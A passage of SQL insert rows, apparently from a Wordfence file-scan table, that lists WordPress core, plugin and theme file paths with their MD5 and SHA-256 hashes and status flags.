(0x9a86c2aa35b6d96554d58e16f8cf2268, 'wp-content/plugins/revslider/admin/assets/imports/facebook-feed/index.php', 0, 0xd41d8cd98f00b204e9800998ecf8427e, 0xd41d8cd98f00b204e9800998ecf8427e, 0xe3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855, '', 0, '?'),
(0x9a9e94f3df5b9d89f4443f5f851e5b9f, 'wp-includes/random_compat/random_bytes_libsodium.php', 1, 0x00000000000000000000000000000000, 0x349190eee5edbbdfd58fb3e5640617df, 0xeca749d76eff1bb936d8e4a25fe5b3128994a3676138ccd879cdc6045d2eddeb, '', 0, '?'),
(0x9aa0a46244fb5cd4d633aa3746723206, 'wp-content/plugins/revslider/admin/assets/imports/foodcarousel/index.php', 0, 0xd41d8cd98f00b204e9800998ecf8427e, 0xd41d8cd98f00b204e9800998ecf8427e, 0xe3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855, '', 0, '?'),
(0x9aa58f37b8134d33c29ae3241ccbf48c, 'wp-includes/images/smilies/icon_question.gif', 1, 0x00000000000000000000000000000000, 0xb3df5b2d00d22715be1c1d9157b3a246, 0xc63762a018d87c3623c5d0f6edfd83a9392f3f78bb867ebbe38f0b5bb3b52574, '', 0, '?'),
(0x9aaa99913240ef0f6be4ac773e4b9432, 'wp-includes/feed-atom.php', 1, 0x00000000000000000000000000000000, 0x0545cbfce9cbd59bd449245e6947ab5b, 0x21f0a5fe49c6ecfa6d0a5995da662bcc95a15000d70eab8fd031338b5c3dfba0, '', 0, '?'),
(0x9aaaf4a2ec4800db99c0ae689943c1fa, 'wp-admin/css/colors/ectoplasm/colors.css', 1, 0x00000000000000000000000000000000, 0x4f949efcb806d798e79ebdf9aaf3b2ed, 0x98ac55ca78ef785ed6ac4ab69135c336e09691f498542c89f8d8425c83ddf3ee, '', 0, '?'),
(0x9ab07774f248a9ebe1172d739300c26e, 'wp-includes/js/wplink.js', 1, 0x00000000000000000000000000000000, 0xccf54fa65c9b33ce8d2069bd8e3fa0c4, 0x61d3f100beabef155b2547e573b58b2df015a1c38946a1da595c5e5cbcff9f89, '', 0, '?'),
(0x9ab561e6929a4afde43640c2fe769e84, 'wp-content/plugins/Ultimate_VC_Addons/woocomposer/modules/woocomposer_pagination.php', 0, 0xdb2a7d3f42b4ac108fe3183b8a1c4f36, 0xdb2a7d3f42b4ac108fe3183b8a1c4f36, 0xcd6a4c140c43976c92f64cbac42e812b85033677415fcada9c62da5aa750a551, '', 0, '?'),
(0x9ab5d0341d589748d02938c454a7b4f1, 'wp-content/themes/Impreza/functions/migrations/us_migration_4_5.php', 0, 0x807489c5bbf5050250269efb93efb946, 0x807489c5bbf5050250269efb93efb946, 0xd5e042bca763365f7d07406c5e42b8c6a653e49c0b688047b155180be38bebd8, '', 0, '?'),
(0x9ab844c6a2c558065c8712ec62478a13, 'wp-content/plugins/revslider/includes/framework/base.class.php', 0, 0x1eb004a06f67e5213f85512abcce46ad, 0x1eb004a06f67e5213f85512abcce46ad, 0xf20be448bfdacd9d7ccd2b70078826fc4dde60e5b446d1e5c987fe268d67ec9c, '', 0, '?'),
(0x9ac4fe03da3dd6ac4896402d6998ef1f, 'wp-includes/css/admin-bar-rtl.css', 1, 0x00000000000000000000000000000000, 0xa8374ae13c60948627afad8d05b577f3, 0x4df0fc044997cf13484e1f65e0892a6d2c5f907a482138de70276cc513e2b1f2, '', 0, '?'),
(0x9ad6949502c5df9a7928714414ab77c2, 'wp-content/plugins/wordfence/models/common/wfGeoIP2.php', 1, 0x00000000000000000000000000000000, 0xd517594a73406a8c10aaa672b46a746d, 0xc933c391d1b273c6f00d26b17a3d94f0fe8bd66473f3b9cb704a0b78c9339377, '', 0, '?'),
(0x9ad841e2c8ba2a69834d16f04c824581, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_home_24px.svg', 0, 0xdb82c1b9db1b2369f0bda3cd7c0a2899, 0xdb82c1b9db1b2369f0bda3cd7c0a2899, 0xf8c913279291da25e6b512ed8f48989f796defac9150490688cc6ce4664fadbc, '', 0, '?'),
(0x9ae2007fac90d9dd6e07fb187a5d88c7, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/calculator1.svg', 0, 0xa31586ebf142b47a98c4046b16e5774a, 0xa31586ebf142b47a98c4046b16e5774a, 0x85c2b7b191161251b3172f2f793b5dfa6ace62bbc9c5078d0ebd94a145f1be58, '', 0, '?'),
(0x9ae9657266e9afcd23e1e787eca54957, 'wp-content/plugins/js_composer/include/templates/shortcodes/vc_gitem_block.php', 0, 0x3c42470eceac6dc71e5b35e6e52d2411, 0x3c42470eceac6dc71e5b35e6e52d2411, 0xbe3072d2fc2dbf27f4f999eb654ac6059f2c5832e2291268e354791aaa6ec819, '', 0, '?'),
(0x9aea8a688b4c8dbcb24a48ff58230e30, 'wp-content/plugins/wordfence/lib/wfUnlockMsg.php', 1, 0x00000000000000000000000000000000, 0xc00bd1365d757df98329949ff5959e65, 0xa89debef3ac1dd25f9d1d20bf9a56f7aa1ece44ef75d09a2268b8334551cf37f, '', 0, '?'),
(0x9af4d2f03630fac39b930382d972714b, 'wp-content/plugins/js_composer/include/autoload/vendors/gutenberg.php', 0, 0xc7dffa4eeb9c197ba8d9839cab2053bd, 0xc7dffa4eeb9c197ba8d9839cab2053bd, 0x965e41e5ef86446180ccba095576e58b2c7418ca5922fe24ec1d8a12ac956fa5, '', 0, '?'),
(0x9aff995e90078f27bd7188c2ee3085ea, 'wp-links-opml.php', 1, 0x00000000000000000000000000000000, 0xaba0ecab419f6d3c22d9a1f11ae24970, 0x927254ec411cc1e40658f5e6c797b012ec473b96dbd428a406a65978e038d9cf, '', 0, '?'),
(0x9b15e7ccdce0acf773251baee1439b28, 'wp-content/plugins/wordfence/js/wfpopover.1579191227.js', 1, 0x00000000000000000000000000000000, 0x3be30c266dad0b41c4686c4d06505a58, 0xb004ec0c5f2e56e8a28f95ca178e5802cde334104eed695fd2fc6b3dd4e64333, '', 0, '?'),
(0x9b256ea9cd54df92095e04c76758ceb0, 'wp-admin/js/inline-edit-post.js', 1, 0x00000000000000000000000000000000, 0x53ce6b4e6ae287a145d4c6919a1337ab, 0x46dd552dd609a6597168f9ab26fc7d36ca8199cac63bd8fab110854d03461bfa, '', 0, '?'),
(0x9b29ef6fa4d7e2dac051c28e1c919f06, 'wp-content/plugins/revslider/admin/assets/js/vc.js', 0, 0x7701b867a4061a512f76b42cee715c50, 0x7701b867a4061a512f76b42cee715c50, 0xfed567ee0a67a799ded736aa6c752ad0ae9d41ec97e11817ae72afb13ee0be0e, '', 0, '?'),
(0x9b2a9030fb6efea49714845cc96206ee, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/person-dollar.svg', 0, 0xd9d8ad917582a26abcd39fc2d695f250, 0xd9d8ad917582a26abcd39fc2d695f250, 0x74e8597e39e833d5b294e982a6f3094606a6aca731194203b1161796dd621d98, '', 0, '?'),
(0x9b33e2f46144957716b750b69c8ac671, 'wp-admin/includes/class-theme-upgrader.php', 1, 0x00000000000000000000000000000000, 0x1655e947bfd38ee7c315178b648cfd33, 0x8d7a47a3d42fdba7f12ca05952ee512a197c1c5fbb07efc28dcfd85a5406eff9, '', 0, '?'),
(0x9b41a577a3a79e8de7de469ecf4981ab, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_settings_brightness_24px.svg', 0, 0xd92040e25ed85a4fbafa868a6622d12b, 0xd92040e25ed85a4fbafa868a6622d12b, 0xdc48b67eaa2d206cebe98169260bcc35ed6a2d206f2e92cec431a40894f8c1ca, '', 0, '?'),
(0x9b47127e8d592dea3bf3ab6a31b300dd, 'wp-content/plugins/js_composer/include/classes/shortcodes/vc-row-inner.php', 0, 0xbba0101a3e4b1335ab82d99d0bb54b33, 0xbba0101a3e4b1335ab82d99d0bb54b33, 0x2a4517a87464ffb1b6facec046d4aa5634c20d1a79c8b936b27095a976c2bdfb, '', 0, '?'),
(0x9b6698637e73b8e970d1b980df818c33, 'wp-content/plugins/revslider/public/assets/assets/svg/device/ic_screen_lock_rotation_24px.svg', 0, 0xf1c0c22c19552c629f5754db593cf37e, 0xf1c0c22c19552c629f5754db593cf37e, 0x164d0fcffa3110970b068ab968077c2faa7a436e2ae685d6c43af361403d117c, '', 0, '?'),
(0x9b97507c36ac265afd01dc5eceaff857, 'wp-content/themes/Impreza/framework/shortcodes/vc_column.php', 0, 0xb24620e2ffad950ab3e6bb334c7bbbfb, 0xb24620e2ffad950ab3e6bb334c7bbbfb, 0x905e440ddde2b140a321a29a0ddd0ddc10d5d16e21c43f4c8c00d7397522fa8e, '', 0, '?'),
(0x9b9a6e26a2e21b1ff06ebc21e5b4acee, 'wp-admin/css/site-icon.min.css', 1, 0x00000000000000000000000000000000, 0x6c951fcb811b78da4a91c55447888f98, 0x15f02bcac5ce57b5fff656dbf033af287146e8ede6c0723bb77c5e06f640a4d5, '', 0, '?'),
(0x9bc62b14559a70fa182ac66d85f4b19f, 'wp-content/themes/Impreza/framework/plugins-support/js_composer/map/us_separator.php', 0, 0x15da8f4dfbbe6db6bc025c8561bf1d16, 0x15da8f4dfbbe6db6bc025c8561bf1d16, 0x3b0ad82aaacc240752da7ac68c5781b769d1e9b545a7a6bf95e9fed9db24a65d, '', 0, '?'),
(0x9bedaa5d6abc6cb127b2f496bb2f7835, 'wp-includes/js/wp-sanitize.js', 1, 0x00000000000000000000000000000000, 0xbe9dc83a6b99eaf3458b743651d01b99, 0x79cea656ade5207dc99b0f71fe8ab7914b3edb88503606d3c42af7de430a737d, '', 0, '?'),
(0x9bf3903731d01bacc87d120a01fb14c8, 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/ChaCha20.php', 1, 0x00000000000000000000000000000000, 0x3192322b3b8f46c4eec5d0bd4e4d8392, 0xbe7786c51122b32a94c135a2551220544099e59c6e79c8b3c65e61a575bdb027, '', 0, '?'),
(0x9c02cb3443da4e088fa4e975e7c9fbaf, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_grade_24px.svg', 0, 0x3c4d073754797e4f844a69b8a46f0114, 0x3c4d073754797e4f844a69b8a46f0114, 0xffcda80569e59467ce90674f85b17838f5866cbce5b1f6c4b50794aecd04a280, '', 0, '?'),
(0x9c07e8d05f5524ba3d39323309e404b3, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/manager-globe.svg', 0, 0xb77eb1bc6a3988a316b3f650ca750018, 0xb77eb1bc6a3988a316b3f650ca750018, 0xf7ee4e0dbda5ecf047f4b7fff9ee60c7e4f96e8e41497b7c5d81697b96d3b91a, '', 0, '?'),
(0x9c08f4844e54a23830af47fe1d91ac30, 'wp-content/plugins/js_composer/include/classes/core/access/class-vc-current-user-access-controller.php', 0, 0xdcae438333bab58bdd3c4eddf0e097bd, 0xdcae438333bab58bdd3c4eddf0e097bd, 0xd62615828bc1b78240aa5f23fd39d6976932f2f24d6e6e7ca872b19d43824fb6, '', 0, '?'),
(0x9c1913138b64054dd844b742e56b6bd8, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_collections_bookmark_24px.svg', 0, 0x7cbdc3bd5ac29f49e530b0de11821a27, 0x7cbdc3bd5ac29f49e530b0de11821a27, 0xdbe664a325516a7bec6c60991a5b8185603761827f05cb900baf04915c1424f0, '', 0, '?'),
(0x9c32583639471033df1acf2b7d41fc36, 'wp-content/plugins/wordfence/views/waf/option-whitelist.php', 1, 0x00000000000000000000000000000000, 0x12cea8efdc2d08cbafa6b13383fc77c2, 0x470efe5f6038eb42facaefd88e500a9d0ce8e5222c92271ccfdf48daf0d2c5a8, '', 0, '?'),
(0x9c3519f4870fac83dc0dbf18cb6bd4c4, 'wp-admin/js/color-picker.js', 1, 0x00000000000000000000000000000000, 0x5a2d6a68911f4a366f4ea3ec0a04667e, 0x3c435d55cdb06ca4dae47cc9e0f3d67793b8d9ab4e3b2094b690b8785b0722ca, '', 0, '?'),
(0x9c3883a98e85a6ace3503561c4a89d09, 'wp-includes/images/smilies/icon_wink.gif', 1, 0x00000000000000000000000000000000, 0x653f1432aee113890f69a1179de0e3a5, 0x9a28a49ad456c095157bf1fd561206d5426bc9e8ca14a36f28605abcaa560936, '', 0, '?'),
(0x9c62ed8e806dadcc17fefde880fc6fee, 'wp-content/themes/Impreza/framework/widgets/us_blog.php', 0, 0x674f82348b6cf38ca101eaca91934c7a, 0x674f82348b6cf38ca101eaca91934c7a, 0xca4b146f7f69316bdc28f70dd86f9087d3cc594e042eb4083f56b197ac8fc706, '', 0, '?'),
(0x9c6c230a99e93651f6c2d4f8cc3496ad, 'wp-content/plugins/js_composer/assets/js/frontend_editor/shortcodes/tta/vc_tta_tour.js', 0, 0xacd6c565b7cfbf99f5241fa517639ee8, 0xacd6c565b7cfbf99f5241fa517639ee8, 0x8f2ef4101451a96455f96698d0b163ecb822a4736a93e067315d86bd5da3e616, '', 0, '?'),
(0x9c7635a8ae8005b4c7c42da7814aa414, 'wp-content/plugins/revslider/admin/assets/imports/woocommercesmall/index.php', 0, 0xd41d8cd98f00b204e9800998ecf8427e, 0xd41d8cd98f00b204e9800998ecf8427e, 0xe3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855, '', 0, '?'),
(0x9c8589018afe793835f590dcc3a662d6, 'wp-admin/css/colors/sunrise/colors.css', 1, 0x00000000000000000000000000000000, 0x5f6c9a9233a9b01c16d32a00dd3301f4, 0xe84c99565329b941100bb9992a65cf27e0df0cfed1470ae32080a460a469e7a5, '', 0, '?'),
(0x9c9d3b288581764380a5553aad7596e1, 'wp-content/themes/Impreza/framework/plugins-support/js_composer/templates.php', 0, 0x337521ccfea613a2c1c44aac43074c98, 0x337521ccfea613a2c1c44aac43074c98, 0x8209cb1291cb4bdca4b4128d7d6b21ed6513e309ae4fcedc7e82387ef6f329ee, '', 0, '?'),
(0x9c9f176cdbc0332e09170217584e8202, 'wp-includes/Requests/Exception/HTTP/403.php', 1, 0x00000000000000000000000000000000, 0xbcd160e8f70dc76ffbbf6b33b7fe31df, 0x8749ecf6a96ce945864be0b0d1a6f8a63f5aa312304a54acdaf287e2e1550499, '', 0, '?'),
(0x9ca836560eb232390ef85628097459d2, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/award4.svg', 0, 0xb7d5da50ad527814b47eecb195ec21b8, 0xb7d5da50ad527814b47eecb195ec21b8, 0xe77cc5bd6059ca48285e662c36d569120e60d354a65e2d9c5b4580f4b72598a2, '', 0, '?'),
(0x9cb52bb273bff2aa1bb6d5318d70daa6, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_settings_input_svideo_24px.svg', 0, 0x32474cefa718b276b4cfc20cc029a5e1, 0x32474cefa718b276b4cfc20cc029a5e1, 0x821d28fabca799ab0cd7bbdb69320d5128df1fd34a7cd6c796af09ea2ae1df78, '', 0, '?'),
(0x9cb9d6d8f5c594ed26a42299f9bd5505, 'wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_format_align_center_24px.svg', 0, 0xdd84219c5d71589ebe11a40f72d6711b, 0xdd84219c5d71589ebe11a40f72d6711b, 0x3542d624bd0d6b507847f7330222aa4c05e972aad9b3e5490ace6189b6a04bac, '', 0, '?'),
(0x9cc1832a741a11159cd935607019c152, 'wp-content/plugins/js_composer/assets/js/frontend_editor/shortcodes/containers/container.js', 0, 0xa59912b8454c0f6bca740edd47b567f8, 0xa59912b8454c0f6bca740edd47b567f8, 0xddb7731783c6e3da698ae3e897469bd0fa43e644a8a36c4ebc6db05953fb6c4f, '', 0, '?'),
(0x9cd5138b800c50518b457c457d372b01, 'wp-admin/includes/class-wp-filesystem-ftpsockets.php', 1, 0x00000000000000000000000000000000, 0xa0cdc7c224fcffcf65d59b47e5999e6c, 0x73fd059c43451eb2da2bbc876d25cee1e8e8da0e352b612172e9fcfc52b5efe3, '', 0, '?'),
(0x9ce55589b1f324ec5c2add315e9c53fd, 'wp-includes/js/jquery/ui/effect-clip.min.js', 1, 0x00000000000000000000000000000000, 0xe9294b5b7374f173b76b4286b53faf33, 0x482caad22c27b1341b45f287ca49791ccff9ba83ecc50791521e72a794de763d, '', 0, '?'),
(0x9cf1fbc4fa9e508b4ae6741efbfa317a, 'wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/random_bytes_libsodium.php', 1, 0x00000000000000000000000000000000, 0x21bf81ec071645abb5505dc7a13b9f99, 0x3cbff88b02a600df0d49423d2284503844c722f703b6e0f41bc04c7ee880495b, '', 0, '?'),
(0x9cfe501a8dc52fe904a203af6c0e25a1, 'wp-includes/js/jquery/jquery.hotkeys.js', 1, 0x00000000000000000000000000000000, 0xe29483a8ca26a0dd8b0d1146c6b0a6e9, 0x5d068fa70305c12147bb8f33b89c8fe95b23c83a4ca2130d3a7fa09c76b5433e, '', 0, '?'),
(0x9d0019c920899f6b7e8219a35535540f, 'wp-includes/widgets/class-wp-widget-text.php', 1, 0x00000000000000000000000000000000, 0xbdd47f06b334d7488c20834d0fd17d6c, 0xe81dcf90775e4bb5ab4946da807260107de25ef59024b95a7f175b3033d101a4, '', 0, '?'),
(0x9d097f980d4fb238eff8798e32741f3a, 'wp-content/plugins/wp-super-cache/languages/wp-super-cache-zh_TW.po', 1, 0x00000000000000000000000000000000, 0x232774a3a578a1904014a5c0a4427a81, 0x7aafcbb1de7789095eb6272c2d7f8b312c8177eb751e886c5aa5906bcc5b9770, '', 0, '?'),
(0x9d0a25665b1b216145ab72d274678069, 'wp-includes/images/media/video.png', 1, 0x00000000000000000000000000000000, 0x8de0e9f175ea68179b81dddb71a010f7, 0x447f42558b86a5d14d694fca62892c8bc3e36595f43dcbd257c0177bbf13f0e6, '', 0, '?'),
(0x9d1934fa262b299b2b37dea49e722b71, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_view_comfy_24px.svg', 0, 0xc1e09378c2ba90831430a7148e91663b, 0xc1e09378c2ba90831430a7148e91663b, 0x430a43a132df358954b8ac212f29b4321f5230c15a1f28336bbc6005c138885f, '', 0, '?'),
(0x9d26078753eca7bf6fb824e6f730f86e, 'wp-includes/author-template.php', 1, 0x00000000000000000000000000000000, 0xda618a43112e5df99396a7b04a831e6e, 0x402b87ae458bf49581413f28fb8b3a54d7ffac425b629730f240481dba61cbe7, '', 0, '?'),
(0x9d47a87c240c1d10701cd6a02b28aa1b, 'wp-admin/js/tags-box.js', 1, 0x00000000000000000000000000000000, 0x027bb2cd44a823dbd923b98a4f76a9c0, 0xb521c12ca2c7962f3498b43ba0c57233611a056d763a59386d6a179b9bfb8e65, '', 0, '?'),
(0x9d4d1a4d2a64fa666343f06adf37d7c4, 'wp-content/plugins/revslider/admin/assets/imports/showcasecarousel/index.php', 0, 0xd41d8cd98f00b204e9800998ecf8427e, 0xd41d8cd98f00b204e9800998ecf8427e, 0xe3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855, '', 0, '?'),
(0x9d50755d8b0860901e82cc3b26820e6e, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/head-dollar.svg', 0, 0x41d069ea5391366baef4d8263a6fa5fd, 0x41d069ea5391366baef4d8263a6fa5fd, 0x35dd44b33579e31300bb98c688e6ce304926725adc418b593d92139ffb0664ef, '', 0, '?'),
(0x9d51a0b2c1ccd481ef328a3775eda04c, 'wp-includes/js/tinymce/skins/lightgray/fonts/tinymce.svg', 1, 0x00000000000000000000000000000000, 0xd031f47facf4331979b6f9fbac3187ef, 0x097dacc54eac093cc976e37fadb71f4203b11b17532502e198735cfcfef75384, '', 0, '?'),
(0x9d52dbd942a170c01195166dd85aaa3b, 'wp-includes/css/dist/block-editor/style.min.css', 1, 0x00000000000000000000000000000000, 0x0e9b74f1a376a273cb1c2c234cba71b0, 0xed0b07cbbf182007a69205e973e51117b3594d7cda6fcd8d2947bb1c4ad02c54, '', 0, '?'),
(0x9d563130dc78564186f9cef5d1e12d53, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/pound.svg', 0, 0x1c0cd27266e4749b7e586a48a2cdc6e6, 0x1c0cd27266e4749b7e586a48a2cdc6e6, 0x60632f94401704362ea5fa17f1bb7415f9dac9215a035f0dc619ba74765affe0, '', 0, '?'),
(0x9d7d1d0d1c00aac65d02aec539a71e55, 'wp-content/plugins/revslider/public/assets/assets/svg/device/ic_data_usage_24px.svg', 0, 0xa0f6a0cf4bb44bdd344cd2ceb0713bfb, 0xa0f6a0cf4bb44bdd344cd2ceb0713bfb, 0xf984df1c4227c33898a1104b1e4ecdc2a1288d34da48aee49e41d77733f92a3f, '', 0, '?'),
(0x9d7f6ff76af98b13c905bb79e61da956, 'wp-content/plugins/wordfence/lib/menu_tools.php', 1, 0x00000000000000000000000000000000, 0x67d48c17e9709950b049675b3d9b10ec, 0x9b56b2c911fb211df38f82de9f87b5c69a5f7ad53d957cc0796158f7c88f11a0, '', 0, '?'),
(0x9d864361de73c15d9eb26e812f15e5ec, 'wp-includes/css/dist/block-library/theme-rtl.min.css', 1, 0x00000000000000000000000000000000, 0x3eeaac647e4cd06679739d9554c96c86, 0xe178aa86db6293f140d7e31372b401e576febe007bf66f6d56da128635ceeb36, '', 0, '?'),
(0x9d92d1ba9f22cc5035ecd35e55811a69, 'wp-admin/index.php', 1, 0x00000000000000000000000000000000, 0x846d7d612a2a30206caeeac76d1b3cdd, 0x04e8ac0a1512f8843636bc052793ebefa8a4c249491f7f5a03bbb79ae5300210, '', 0, '?'),
(0x9d9feeb87354e374d2d82d250680de6b, 'wp-content/themes/Impreza/framework/config/icon-sets.php', 0, 0x16cdf299b6b2e24129b2ea9b1ef6b4b2, 0x16cdf299b6b2e24129b2ea9b1ef6b4b2, 0xb13f874a04bb0f10f2f73c5ae799b331ef49a8635b929618aaac4f24716d1700, '', 0, '?'),
(0x9da4716e4b1e1f5311472d53d5e5f13d, 'wp-content/plugins/wp-super-cache/plugins/multisite.php', 1, 0x00000000000000000000000000000000, 0x8379b7b3628b6509c599f21610269ed4, 0x7e38da25154aedfe75e2ed4f8637aabdab10d5a04959f7b7c41a9d70ed577dc4, '', 0, '?'),
(0x9da76dcc119cfd7a34e84ce4af04fa4b, 'wp-admin/images/xit.gif', 1, 0x00000000000000000000000000000000, 0x94ecab09335897c4ab392bef96366e7e, 0xfcd6fc2073b2afb994c9dbdba80c93a0532c6d64ef9f5c59146292c687efc26f, '', 0, '?'),
(0x9db490c741f3472c87c33c8c07b8b816, 'wp-includes/js/jquery/ui/effect-fade.min.js', 1, 0x00000000000000000000000000000000, 0x8a30f21e345577b420a78c5aba2b3156, 0xbf41942d9e794adb367b47324740a872e9bfe3cb05211aa49cb04470b0b3f90c, '', 0, '?'),
(0x9e02469983162e87baa788d19d7d8f3a, 'wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_format_paint_24px.svg', 0, 0xddc6f503821ced78ff89e66a8a475b62, 0xddc6f503821ced78ff89e66a8a475b62, 0xacf3e3f17c857fbe6f9eec1ec86d83f90b111bbef5cd77f0ac4bda3aae0ab532, '', 0, '?'),
(0x9e09450fa864f350879060d0543d8e7c, 'wp-content/plugins/js_composer/include/templates/params/vc_grid_item/shortcodes/vc_button2.php', 0, 0x3bad9de088db0e128fb6c0795fc6760c, 0x3bad9de088db0e128fb6c0795fc6760c, 0xb0b82070c78c1b11c2322ccf4ccfcf714576c49ab1a6e0753684c84a0f707883, '', 0, '?'),
(0x9e120668793246c0c4896fd67a603845, 'wp-content/plugins/revslider/public/assets/assets/svg/social/ic_whatshot_24px.svg', 0, 0x0334bf2c38891c1c63d1071b632b4af3, 0x0334bf2c38891c1c63d1071b632b4af3, 0xe0325f4d12146f03fb8e8c65c803fa932ce5f73833874e76334899f80c8a21b6, '', 0, '?'),
(0x9e13b582b484d5b009cc8bd3c8b2c353, 'wp-content/plugins/wordfence/views/scanner/scan-progress-detailed.php', 1, 0x00000000000000000000000000000000, 0x108bd32018b36a3c63ec2853434abb1b, 0x723348ea5b7ef532e72ed63c5f4a337b9b5410117bc6c658858cd3bcd650f971, '', 0, '?'),
(0x9e192d3cdc64536e4dd61c89b994c30c, 'wp-content/plugins/js_composer/assets/js/frontend_editor/shortcodes/containers/container_with_parent.js', 0, 0xc38e3c5463faea9aaa3c03f6e7a80869, 0xc38e3c5463faea9aaa3c03f6e7a80869, 0x7487618a663335da710274649a3a43cdcdd8941d5fb08244f1ed9d2137ee95ff, '', 0, '?'),
(0x9e20c16e80249b877188ef5e7166b4a7, 'wp-includes/images/smilies/icon_lol.gif', 1, 0x00000000000000000000000000000000, 0x6ec199f5e3ff3ad1b7268a83f9d628bc, 0xde6cf3319648711606fa2eedb5328f78d21c07a8f3a2be8924cb59821a38f382, '', 0, '?'),
(0x9e275e934412fdd74947de310b85d921, 'wp-includes/ms-site.php', 1, 0x00000000000000000000000000000000, 0x1845ab6bba060754c5206dcae7621612, 0x9d1330b78678ff28da851a58fbeb77c415b5f666ca428717f4e5d61850fcccc3, '', 0, '?'),
(0x9e2a0254f1750da2edd3d61da07eaa6d, 'wp-admin/css/colors/ocean/colors.min.css', 1, 0x00000000000000000000000000000000, 0xb4efb3e7744d0a1e70748138da9e6804, 0x978e1d0f941bbe5718d8c00409ca84e15db4175559de316b4daa7a269cdb8d3e, '', 0, '?'),
(0x9e316c3c9c2011747e4c9f05550477f3, 'wp-includes/class-wp-locale.php', 1, 0x00000000000000000000000000000000, 0xdfbca0bd071cb4e3a580d4ac74e59018, 0x226d4599b65f42cb576a9d773312d78c1481f25af7dbac4d976b2b2ef9dc99fb, '', 0, '?'),
(0x9e452d6ae0ca316aeca3ca0d02cf4593, 'wp-includes/registration-functions.php', 1, 0x00000000000000000000000000000000, 0x8d2b678a6f5cc93de2e7071702a4e6d7, 0x5a64ffeb5f767e52c9e714cd9de6ee48ddf83a9a7c5401ba1822993fdbaf7604, '', 0, '?'),
(0x9e4691a3377a2389c9e43c8eff8ba780, 'wp-content/plugins/revslider/public/assets/assets/svg/hardware/ic_power_input_24px.svg', 0, 0x4439abbdc9dfb4a8b34ef2e1de3ffd5b, 0x4439abbdc9dfb4a8b34ef2e1de3ffd5b, 0x7bdcba7ba999be952f7c1ddd98e441fc4a2270893bb47d52fce7c47949166f8c, '', 0, '?'),
(0x9e5d6f4df0a273651406aaaa4a341dc8, 'wp-content/plugins/wordfence/views/dashboard/options-group-view-customization.php', 1, 0x00000000000000000000000000000000, 0x7e0b4860e802b462006e7642204a5122, 0xe9ebde4604cbb24980841918d1479af9eac81136cf0b678ce856b029c230a66b, '', 0, '?'),
(0x9e6620aca772c570ce28978b70a024a9, 'wp-content/plugins/wordfence/modules/login-security/img/ui-icons_555555_256x240.png', 1, 0x00000000000000000000000000000000, 0x1e70a2d46244ee4070fd47152bd71db1, 0x0f2a447f15055acd3ef94267f11b2659128959889bfe848ee2a80234283ca82f, '', 0, '?'),
(0x9e67944beb3bfb7146bb56497dfe51ed, 'wp-includes/Requests/Exception/HTTP/416.php', 1, 0x00000000000000000000000000000000, 0xf931824e39e39617c9aac661804478f8, 0xda28e0dd026d796256f56149c56a5770998c1baf282141e9f0eb1fde3c28b158, '', 0, '?'),
(0x9e85b6bbbdeea212e8863cef78cd428c, 'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/waf.php', 1, 0x00000000000000000000000000000000, 0x67509720720288f8b4e691a7eb75b55c, 0xfa1f9e41b32c185af38f3cb06fb1fc41aff766a277a8a0f8a79e21eecf7fa082, '', 0, '?'),
(0x9e9d592db282be985d29cdd3c58b738a, 'wp-content/uploads/smile_fonts/Defaults/Defaults.svg', 0, 0xf4ca5a42323b629c67e6a7776f67da68, 0xf4ca5a42323b629c67e6a7776f67da68, 0xa6a2666f90678c297ef09aa4ee519eaaca549aea8e1f50f309975ceab9f01b7c, '', 0, '?'),
(0x9ea3659d2da8d252c88994aef94c3ad1, 'wp-content/plugins/wordfence/lib/rest-api/wfRESTConfigController.php', 1, 0x00000000000000000000000000000000, 0x2d6eb728d69f01d6e6353e20612e279d, 0xfa13ca6abf5ecff1b0d821ccc3fd1203b0bf7966e9d3b30c756377ed578acd78, '', 0, '?'),
(0x9eb9f8489c0ece3f6cd632e2742cbc9b, 'wp-content/plugins/revslider/public/assets/assets/svg/navigation/ic_more_horiz_24px.svg', 0, 0x22e3dd8a496c39c66bdc6ed99b85cc11, 0x22e3dd8a496c39c66bdc6ed99b85cc11, 0x73dfe80921a78ff517455cb229a317bc7cfbdc87eeae5221345a67cc83eee39a, '', 0, '?'),
(0x9ecfd9706b3d35774fde75067aee2bc9, 'wp-content/plugins/revslider/public/assets/assets/svg/communication/ic_call_missed_24px.svg', 0, 0xc6b4b20536dc9bfb4cdd419b404abff3, 0xc6b4b20536dc9bfb4cdd419b404abff3, 0x1a7bbccdc8da95580420ec19676d7c81aed5b1127ff1ce27d812ba3ba0990084, '', 0, '?'),
(0x9ed2228cb870e5222d439a0ffda59577, 'wp-admin/js/wp-fullscreen-stub.min.js', 1, 0x00000000000000000000000000000000, 0x1524661e32c6718ba9ca81314b5272f8, 0x6177cc4156c820d83e5bf78b12474195a7491a0bec200c0cd6e2ea63725c6ce8, '', 0, '?'),
(0x9eee703f455ea240b7278ce3501245c5, 'wp-admin/edit-comments.php', 1, 0x00000000000000000000000000000000, 0x831745d541e43c8a1f1d7a487a183fe0, 0xc3c3076865c87149f8339519a5fa0b8cf67ab36489364c1d6d17d6a049bb9203, '', 0, '?'),
